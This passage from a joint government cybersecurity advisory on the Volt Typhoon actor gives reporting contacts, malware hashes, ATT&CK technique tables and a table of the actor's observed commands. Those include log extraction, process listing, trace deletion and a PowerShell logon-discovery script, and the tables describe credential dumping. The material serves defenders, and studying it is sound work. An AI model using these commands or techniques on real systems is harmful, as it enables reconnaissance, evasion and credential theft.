Advisory, contact: CISA’s 24/7 Operations Center at Report@cisa.gov or 1-844-Say-CISA (1-844-729-2472) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov. Water and Wastewater Systems Sector organizations, contact the EPA Water Infrastructure and Cyber Resilience Division at watercyberta@epa.gov to voluntarily provide situational awareness. Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact EnergySRMA@hq.doe.gov. For transportation entities regulated by TSA, report to CISA Central in accordance with the requirements found in applicable Security Directives, Security Programs, or TSA Order. Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca. New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654. United Kingdom organizations: Report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 5 through Table 17). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. REFERENCES [1] fofa[2] Microsoft: Volt Typhoon targets US critical infrastructure with living-off-the-land techniques[3] GitHub – fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet[4] GitHub – sandialabs/gait: Zeek Extension to Collect Metadata for Profiling of Endpoints and Proxies[5] The Zeek Network Security Monitor RESOURCES Microsoft: Volt Typhoon targets US critical infrastructure with living-off-the-land techniquesSecureworks: Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations DISCLAIMER The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies. ACKNOWLEDGEMENTS Fortinet and Microsoft contributed to this advisory. VERSION HISTORY February 7, 2024: Initial Version.March 7, 2024: Updated Mitigations section to add recommendation on “end of life” technology. APPENDIX A: VOLT TYPHOON OBSERVED COMMANDS / LOTL ACTIVITY See Table 2 and Table 3 for Volt Typhoon commands and PowerShell scripts observed by the U.S. authoring agencies during incident response activities. For additional commands used by Volt Typhoon, see joint advisory People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Table 2: Volt Typhoon Observed Commands in PowerShell Console History Command/Script Description/Use Get-EventLog security -instanceid 4624 -after {redacted date} | fl * | Out-File ‘C:\users\public\documents\user.dat’   PowerShell command extracts security log entries with the Event ID 4624 after a specified date. The output is formatted (fl *) and saved to user.dat. Potentially used to analyze logon patterns and identify potential targets for lateral movement. Get-EventLog security -instanceid 4624 | Where-Object {$_.message.contains(‘{redacted user account}’)} | select -First 1 | fl *   PowerShell command extracts security log entries with the Event ID 4624 and filters them to include only those containing a specific user account, selecting the first instance of such an event. wminc process get name,processid Appears to be an attempt to use the wmic command but with a misspelling (wminc instead of wmic). This command, as it stands, would not execute successfully and would return an error in a typical Windows environment. This could indicate a mistake made during manual input. wmic process get name,processid   WMI command lists all running processes with process names and process IDs. Potentially used to find process IDs needed for other operations, like memory dumping. tasklist /v   Command displays detailed information about currently running processes, including the name, PID, session number, and memory usage. taskkill /f /im rdpservice.exe Command forcibly terminates the process rdpservice.exe. Potentially used as a cleanup activity post-exploitation. ping -n 1 {redacted IP address} Command sends one ICMP echo request to a specified IP address. ping -n 1 -w 1 {redacted IP address} Command sends one ICMP echo request to a specified IP address with a timeout (-w) of 1 millisecond. net user Lists all user accounts on the local machine or domain, useful for quickly viewing existing user accounts. quser   query user Displays information about user sessions on a system, aiding in identifying active users or sessions. net start Lists all active services. cmd Opens a new instance of the command prompt. cd [Redacted Path] Changes the current directory to a specified path, typically for navigating file systems. Remove-Item .\Thumbs.db PowerShell command to delete the Thumbs.db file, possibly for cleanup or removing traces. move .\Thumbs.db ttt.dat Relocates and renames the file Thumbs.db in the current directory to ttt.dat within the same directory. del .\Thumbs.db /f /s /q Force deletes Thumbs.db files from the current directory and all subdirectories, part of cleanup operations to erase traces. del ?? Deletes files with two-character names, potentially a targeted cleanup command. del /? Displays help information for the del command. exit Terminates the command prompt session. ipconfig Retrieves network configuration details, helpful for discovery and mapping the victim’s network. net time /dom Queries or sets the network time for a domain, potentially used for reconnaissance or to manipulate system time. netstta -ano Intended as netstat -ano; a mistyped command indicating a potential operational error. netstat -ano Lists active network connections and processes, helpful for identifying communication channels and potential targets. type .\Notes.txt Displays the contents of Notes.txt, possibly used for extracting specific information or intelligence gathering. logoff Logs off the current user session. Table 3: Volt Typhoon Observed PowerShell Scripts Script name and location Contents Description/Use C:\{redacted}\logins.ps1 # Find DC list from Active Directory $DCs = Get-ADDomainController -Filter *   # Define time for report (default is 1 day) $startDate = (get-date).AddDays(-1)   # Store successful logon events from security logs with the specified dates and workstation/IP in an array foreach ($DC in $DCs){ $slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname -after $startDate | where {$_.eventID -eq 4624 }}   # Crawl through events; print all logon history with type, date/time, status, account name, computer and IP address if user logged on remotely    foreach ($e in $slogonevents){  # Logon Successful Events  # Local (Logon Type 2)  if (($e.EventID -eq 4624 ) -and ($e.ReplacementStrings[8] -eq 2)){  write-host “Type: Local Logon`tDate: “$e.TimeGenerated “`tStatus: Success`tUser: “$e.ReplacementStrings[5] “`tWorkstation: “$e.ReplacementStrings[11]  }  # Remote (Logon Type 10)  if (($e.EventID -eq 4624 ) -and ($e.ReplacementStrings[8] -eq 10)){  write-host “Type: Remote Logon`tDate: “$e.TimeGenerated “`tStatus: Success`tUser: “$e.ReplacementStrings[5] “`tWorkstation: “$e.ReplacementStrings[11] “`tIP Address: “$e.ReplacementStrings[18]  }} The script is designed for user logon discovery in a Windows Active Directory environment. It retrieves a list of DCs and then queries security logs on these DCs for successful logon events (Event ID 4624) within the last day. The script differentiates between local (Logon Type 2) and remote (Logon Type 10) logon events. For each event, it extracts and displays details including the logon type, date/time of logon, status, account name, and the workstation or IP address used for the logon. Volt Typhoon may be leveraging this script to monitor user logon activities across the network, potentially to identify patterns, gather credentials, or track the movement of users and administrators within the network. APPENDIX B: INDICATORS OF COMPROMISE See Table 4 for Volt Typhoon IOCs obtained by the U.S. authoring agencies during incident response activities. Note: See MAR-10448362-1.v1 for more information on this malware. Table 4: Volt Typhoon Malicious Files and Associated Hashes File Name Description MD5 Hashes (SHA256) BrightmetricAgent.exe The file is an FRP that could be used to reveal servers situated behind a network firewall or obscured through Network Address Translation (NAT).   fd41134e8ead1c18ccad27c62a260aa6 edc0c63065e88ec96197c8d7a40662a15a812a9583dc6c82b18ecd7e43b13b70 SMSvcService.exe The file is a Windows executable “FRPC” designed to open a reverse proxy between the compromised system and the threat actor(s) C2 server. b1de37bf229890ac181bdef1ad8ee0c2 99b80c5ac352081a64129772ed5e1543d94cad708ba2adc46dc4ab7a0bd563f1 APPENDIX C: MITRE ATT&CK TACTICS AND TECHNIQUES See Table 5 through Table 17 for all referenced threat actor tactics and techniques in this advisory. Table 5: Volt Typhoon actors ATT&CK Techniques for Enterprise – Reconnaissance Reconnaissance     Technique Title ID Use Gather Victim Host Information T1592 Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators. Gather Victim Identity Information T1589 Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization’s staff. Gather Victim Identity Information: Email Addresses T1589.002 Volt Typhoon targets the personal emails of key network and IT staff. Gather Victim Network Information T1590 Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization’s network. Gather Victim Org Information T1591 Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization. Search Open Websites/Domains T1593 Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators. Search Victim-Owned Websites T1594 Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators. Table 6: Volt Typhoon actors ATT&CK Techniques for Enterprise – Resource Development Resource Development     Technique Title ID Use Acquire Infrastructure: Botnet T1583.003 Volt Typhoon uses multi-hop proxies for command-and-control infrastructure. The proxy is typically composed of Virtual Private Servers (VPSs) or small office/home office (SOHO) routers. Compromise Infrastructure: Botnet T1584.005 Volt Typhoon used Cisco and NETGEAR end-of-life SOHO routers implanted with KV Botnet malware to support their operations. Compromise Infrastructure: Server T1584.004 Volt Typhoon has redirected specific port traffic to their proxy infrastructure, effectively converting the PRTG’s Detection Guidance server into a proxy for their C2 traffic. Develop Capabilities: Exploits T1587.004 Volt Typhoon uses publicly available exploit code, but is also adept at discovering and exploiting vulnerabilities as zero days. Obtain Capabilities: Exploits T1588.005 Volt Typhoon uses publicly available exploit code, but is also adept at discovering and exploiting vulnerabilities as zero days. Table 7: Volt Typhoon actors ATT&CK Techniques for Enterprise – Initial Access Initial Access     Technique Title ID Use Exploit Public-Facing Application T1190 Volt Typhoon commonly exploits vulnerabilities in networking appliances such as Fortinet, Ivanti (formerly Pulse Secure), NETGEAR, Citrix, and Cisco. External Remote Services T1133 Volt Typhoon often uses VPN sessions to securely connect to victim environments, enabling discreet follow-on intrusion activities. Table 8: Volt Typhoon actors ATT&CK Techniques for Enterprise – Execution Execution     Technique Title ID Use Command and Scripting Interpreter T1059 Volt Typhoon uses hands-on-keyboard execution for their malicious activity via the command-line. Command and Scripting Interpreter: PowerShell T1059.001 Volt Typhoon has executed clients via PowerShell. Command and Scripting Interpreter: Unix Shell T1059.004 Volt Typhoon has used Brightmetricagent.exe, which contains multiplexer libraries that can bi-directionally stream data over through NAT networks and contains a command-line interface (CLI) library that can leverage command shells such as PowerShell, Windows Management, Instrumentation (WMI), and Z Shell (zsh). Windows Management Instrumentation T1047 Volt Typhoon has used Windows Management Instrumentation Console (WMIC) commands. Table 9: Volt Typhoon actors ATT&CK Techniques for Enterprise – Persistence Persistence     Technique Title ID Use Valid Accounts T1078 Volt Typhoon primarily relies on valid credentials for persistence. Table 10: Volt Typhoon actors ATT&CK Techniques for Enterprise – Privilege Escalation Privilege Escalation     Technique Title ID Use Exploitation for Privilege Escalation T1068 Volt Typhoon first obtains credentials from public-facing appliances after gaining initial access by exploiting privilege escalation vulnerabilities in the operating system or network services. Table 11: Volt Typhoon actors ATT&CK Techniques for Enterprise – Defense Evasion Defense Evasion     Technique Title ID Use Direct Volume Access T1006 Volt Typhoon has executed the Windows-native vssadmin command to create a volume shadow copy. Indicator Removal: Clear Persistence T1070.009 Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names. Indicator Removal: Clear Windows Event Logs T1070.001 Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names. Indicator Removal: File Deletion T1070.004 Volt Typhoon created systeminfo.dat in C:\Users\Public\Documents, but subsequently deleted it. Masquerading: Match Legitimate Name or Location T1036.005 Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names. Modify Registry T1112 Volt Typhoon has used the netsh command, a legitimate Windows command, to create a PortProxy registry modification on the PRTG server. Obfuscated Files or Information: Software Packing T1027.002 Volt Typhoon has obfuscated FRP client files (BrightmetricAgent.exe and SMSvcService.exe) and the command-line port scanning utility ScanLine by packing the files with Ultimate Packer for Executables (UPX). System Binary Proxy Execution T1218 Volt Typhoon uses hands-on-keyboard activity via the command-line and use other native tools and processes on systems (often referred to as “LOLBins”), known as LOTL, to maintain and expand access to the victim networks. Table 12: Volt Typhoon actors ATT&CK Techniques for Enterprise – Credential Access Credential Access     Technique Title ID Use Brute Force: Password Cracking T1110.002 Volt Typhoon has exfiltrated NTDS.dit and SYSTEM registry hive to crack passwords offline. Credentials from Password Stores T1555 Volt Typhoon has installed browsers saved passwords history, credit card details, and cookies. Credentials from Password Stores: Credentials from Web Browsers T1555.003 Volt Typhoon has strategically targeted network administrator web browser data, focusing on both browsing history and stored credentials. OS Credential Dumping: LSASS Memory T1003.001 Volt Typhoon used a DLL with MiniDump and the process ID of Local Security Authority Subsystem Service (LSASS) to dump the LSASS process memory and obtain credentials. OS Credential Dumping: NTDS T1003.003 Volt Typhoon appears to prioritize obtaining valid credentials by extracting the Active Directory database file (NTDS.dit). Unsecured Credentials T1552 Volt Typhoon has obtained credentials insecurely stored on an appliance. Unsecured Credentials: Private Keys T1552.004 Volt Typhoon has accessed a Local State file that contains the Advanced Encryption Standard (AES) encryption key used to encrypt the passwords stored in the Chrome browser, which enables the actors to obtain plaintext passwords stored in the Login Data file in the Chrome browser. Table 13: Volt Typhoon actors ATT&CK Techniques for Enterprise – Discovery Discovery     Technique Title ID Use Account Discovery: Local Account T1087.001 Volt Typhoon executed net user and quser for user account information. Application Window Discovery T1010 Volt Typhoon created and accessed a file named rult3uil.log on a Domain Controller in C:\Windows\System32\. The rult3uil.log file contained user activities on a compromised system, showcasing a combination of window title information and focus shifts, keypresses, and command executions across Google Chrome and Windows PowerShell, with corresponding timestamps. Browser Information Discovery T1217 Volt Typhoon has installed browsers saved passwords history, credit card details, and cookies. File and Directory Discovery T1083 Volt Typhoon enumerated several directories​, including directories containing vulnerability testing and cyber related content and facilities data, such as construction drawings. Log Enumeration T1654 Volt Typhoon has captured successful logon events. Network Service Discovery T1046 Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery. Peripheral Device Discovery T1120 Volt Typhoon has obtained the victim’s system screen dimension and display devices information. Permission Groups Discovery T1069 Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery. Process Discovery T1057 Volt Typhoon executed tasklist /v to gather a detailed process listing. Query Registry T1012 Volt Typhoon has interacted with a PuTTY application by enumerating existing stored sessions. Software Discovery T1518 Volt Typhoon has obtained the victim’s list of applications installed on the victim’s system. System Information Discovery T1082 Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery. System Location Discovery T1614 Volt Typhoon has obtained the victim’s system current locale. System Network Configuration Discovery: Internet Connection Discovery T1016.001 Volt Typhoon employs ping with various IP addresses to check network connectivity and net start to list running services. System Owner/User Discovery T1033 Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery. System Service Discovery T1007 Volt Typhoon employs ping with various IP addresses to check network connectivity and net start to list running services. System Time Discovery T1124 Volt Typhoon has obtained the victim’s system timezone. Table 14: Volt Typhoon actors ATT&CK Techniques for Enterprise – Lateral Movement Lateral Movement     Technique Title ID Use Remote Service Session Hijacking T1563 Volt Typhoon potentially had access to a range of critical PuTTY profiles, including those for water treatment plants, water wells, an electrical substation, operational technology systems, and network security devices. This would enable them to access these critical systems. Remote Services: Cloud Services T1021.007 During the period of Volt Typhoon’s known network presence, there were anomalous login attempts to an Azure tenant potentially using credentials previously compromised from theft of NTDS.dit. Remote Services: Remote Desktop Protocol T1021.001 Volt Typhoon has moved laterally to the Domain Controller via an interactive RDP session using a compromised account with domain administrator privileges. Use Alternate Authentication Material T1550 Volt Typhoon may be capable of using other methods such as Pass the Hash or Pass the Ticket for lateral movement. Valid Accounts: Cloud Accounts T1078.004 During the period of Volt Typhoon’s known network presence, there were anomalous login attempts to an Azure tenant potentially using credentials previously compromised from theft of NTDS.dit. Table 15: Volt Typhoon actors ATT&CK Techniques for Enterprise – Collection Collection     Technique Title ID Use Archive Collected Data T1560 Volt Typhoon collected sensitive information obtained from a file server in multiple zipped files. Archive Collected Data: Archive via Utility T1560.001 Volt Typhoon has compressed and archived the extracted ntds.dit and accompanying registry files (by executing ronf.exe, which was likely a renamed version of rar.exe). Data Staged T1074 Volt Typhoon accessed the file C:\Users\{redacted}\Downloads\History.zip, which presumably contained data from the User Data directory of the user’s Chrome browser, which the actors likely saved in the Downloads directory for exfiltration. Screen Capture T1113 Volt Typhoon has obtained a screenshot of the victim’s system using two libraries (gdi32.dll and gdiplus.dll) Table 16: Volt Typhoon actors ATT&CK Techniques for Enterprise – Command and Control Command and Control     Technique Title ID Use Encrypted Channel T1573 Volt Typhoon has setup FRP clients on a victim’s corporate infrastructure to establish covert communications channels for command and control. Ingress Tool Transfer T1105 Volt Typhoon uses legitimate, but outdated versions of network admin tools. For example, in one confirmed compromise, actors downloaded an outdated version of comsvcs.dll, on the DC in a non-standard folder. Proxy T1090 Volt Typhoon has setup FRP clients on a victim’s corporate infrastructure to establish covert communications channels for command and control. Proxy: Internal Proxy T1090.001 Volt Typhoon has used the netsh command, a legitimate Windows command, to create a PortProxy registry modification on the PRTG server. Proxy: Multi-hop Proxy T1090.003 Volt Typhoon uses multi-hop proxies for command-and-control infrastructure. Table 17: Volt Typhoon actors ATT&CK Techniques for Enterprise – Exfiltration Exfiltration     Technique Title ID Use Exfiltration Over Alternative Protocol T1048 Volt Typhoon exfiltrated files via Server Message Block (SMB).